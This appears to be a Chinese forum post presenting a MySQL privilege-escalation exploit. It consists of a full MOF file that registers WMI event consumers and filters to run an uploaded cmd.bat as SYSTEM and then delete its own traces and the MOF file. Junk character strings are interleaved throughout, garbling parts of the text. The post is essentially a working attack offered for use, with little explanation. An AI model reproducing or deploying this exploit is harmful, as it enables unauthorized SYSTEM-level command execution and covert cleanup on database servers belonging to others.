Mysql 提权即时无错Mof exp

admin

这个sql提权MOF需要运行 system下的文件，不能定义路径。
: D. W1 x5 \% W需要将要运行的命令写入到bat上传到system32目录，然后执行。
4 m0 c9 }, Q  ]3 P, @! b! ~: I5 [
这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。
8 ^; u# K, v) w' t1 v- }# ]) ?
1 @0 ], c/ o: E1 Q0 L& z#pragma
                        namespace("\\\\.\\root\\cimv2")
6 I# n- v! y# N                        class
                        MyClass547
) I* \. L' |( P% h1 H% g+ N                        {           [key]
                        string
                        Name;
5 D$ C. v: h, W  U0 q) b9 N9 S                        };
! j/ j& \* O! q5 z; u1 N  j  X                        class
5 w! ?1 N/ B$ o                        ActiveScriptEventConsumer
                        : __EventConsumer {          [key]
0 B8 k/ A. \2 p0 h( d: w' ]) p                        string
                        Name;           [not_null]
+ y% ?9 o8 Y/ F' q2 R: S! u                        string
                        ScriptingEngine;           string
                        ScriptFileName;           [template]
                        string
                        ScriptText;         uint32 KillTimeout;
) K, x8 E( a: p) X                        }; instance of __Win32Provider as $P {
                        Name
                        =
5 @; X) {) O# {  E- w( v                        "ActiveScriptEventConsumer";     CLSID =
                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
                        PerUserInitialization
                        = TRUE;
$ @# p2 z0 I7 R+ f                        }; instance of __EventConsumerProviderRegistration {         Provider
                        = $P;         ConsumerClassNames
                        =
0 b' c. h0 m$ E" f( Z0 @                        {"ActiveScriptEventConsumer"};
                        };
                        Instance of ActiveScriptEventConsumer
                        as $cons {         Name
                        =
3 i6 p1 ^  i- h                        "ASEC";         ScriptingEngine
  V8 n" H2 d( l/ N2 I& L                        =
, k0 B1 m- ?/ ^& J, M6 H                        "JScript";         ScriptText
* q* r2 P4 z7 c) y                        =
                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };
( f  J3 q' i& I. Y8 C; Z" ^" X                        Instance of ActiveScriptEventConsumer
7 A0 A; O1 F' ?) p$ I  p                        as $cons2 {         Name
# i0 X3 ]1 ?; ?6 K                        =
                        "qndASEC";         ScriptingEngine
) w9 ?- }2 q5 f6 G* I# R                        =
4 J5 ^1 @$ G6 V" P' L( ~3 v                        "JScript";         ScriptText
& Q0 `+ k6 t" E                        =
                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
                        }; instance of __EventFilter as $Filt {         Name
                        =
: B/ F3 l) X9 y2 ]/ B: [8 F5 D' D  E                        "instfilt";         Query
                        =
# f' ]3 _) w9 l                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
                        =
$ m$ A7 W0 c5 J+ e6 N8 E                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
                        =
                        "qndfilt";         Query
& k9 y# O3 {& {4 j- S                        =
( I! n% k. N* u2 d$ j+ [                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
: G- E5 g8 x# W/ ?: f3 R+ E  L                        =
4 P9 o4 w7 I1 [/ z' ?                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
                        = $cons;         Filter
                        = $Filt;
6 B; G5 y% U' m, z) _0 L                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer
                        = $cons2;         Filter
3 T/ U2 S! v  M1 O2 V9 U                        = $Filt2;
                        }; instance of MyClass547
! [- l$ F6 u2 `, k, @( C; K& G                        as $MyClass {         Name
                        =
                        "ClassConsumer";
8 Z( Y2 o  o5 [$ W                        };